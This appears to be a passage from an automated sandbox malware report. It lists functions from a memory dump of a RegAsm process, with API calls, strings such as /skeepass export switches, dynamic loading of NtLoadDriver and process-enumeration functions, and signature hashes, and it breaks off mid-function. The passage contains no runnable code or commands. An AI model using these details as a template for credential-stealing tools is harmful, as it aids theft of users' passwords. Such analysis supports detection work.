                                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                          Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                          • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                          • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule
                                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                          • API String ID: 667068680-2887671607
                                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                          Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                          • API String ID: 1607361635-601624466
                                                          • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                          • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                          • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                          • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                          Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _snwprintf$memset$wcscpy
                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                          • API String ID: 2000436516-3842416460
                                                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                          • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                          Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                          • String ID:
                                                          • API String ID: 1043902810-0
                                                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                          Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@??3@_snwprintfwcscpy
                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                          • API String ID: 2899246560-1542517562
                                                          • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                          • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                          Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 0040DBCD
                                                          • memset.MSVCRT ref: 0040DBE9
                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                            • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                            • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                            • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                          • wcscpy.MSVCRT ref: 0040DC2D
                                                          • wcscpy.MSVCRT ref: 0040DC3C
                                                          • wcscpy.MSVCRT ref: 0040DC4C
                                                          • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                          • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                          • wcscpy.MSVCRT ref: 0040DCC3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                          • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                          • API String ID: 3330709923-517860148
                                                          • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                          • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                          • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                          • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                          Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                          • memset.MSVCRT ref: 004085CF
                                                          • memset.MSVCRT ref: 004085F1
                                                          • memset.MSVCRT ref: 00408606
                                                          • strcmp.MSVCRT ref: 00408645
                                                          • _mbscpy.MSVCRT ref: 004086DB
                                                          • _mbscpy.MSVCRT ref: 004086FA
                                                          • memset.MSVCRT ref: 0040870E
                                                          • strcmp.MSVCRT ref: 0040876B
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                          • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                          • String ID: ---
                                                          • API String ID: 3437578500-2854292027
                                                          • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                          • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                          Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 0041087D
                                                          • memset.MSVCRT ref: 00410892
                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                                          • DeleteObject.GDI32(?), ref: 004109D0
                                                          • DeleteObject.GDI32(?), ref: 004109D6
                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                          • String ID:
                                                          • API String ID: 1010922700-0
                                                          • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                          • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                          Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                          • malloc.MSVCRT ref: 004186B7
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                          • malloc.MSVCRT ref: 004186FE
                                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@$FullNamePath$malloc$Version
                                                          • String ID: |A
                                                          • API String ID: 4233704886-1717621600
                                                          • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                          • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                          Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmp
                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                          • API String ID: 2081463915-1959339147
                                                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                          • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                          Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                          • API String ID: 2012295524-70141382
                                                          • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                          • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                          Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule
                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                          • API String ID: 667068680-3953557276
                                                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                          Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 004121FF
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                          • SelectObject.GDI32(?,?), ref: 00412251
                                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                          • SetCursor.USER32(00000000), ref: 004122BC
                                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                          • memcpy.MSVCRT ref: 0041234D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                          • String ID:
                                                          • API String ID: 1700100422-0
                                                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                          Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                          • String ID:
                                                          • API String ID: 552707033-0
                                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                          Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$_snwprintf
                                                          • String ID: %%0.%df
                                                          • API String ID: 3473751417-763548558
                                                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                          Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                                          • GetTickCount.KERNEL32 ref: 0040610B
                                                          • GetParent.USER32(?), ref: 00406136
                                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                          • String ID: A
                                                          • API String ID: 2892645895-3554254475
                                                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                          Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                          • DestroyMenu.USER32(00000000), ref: 0040D99D
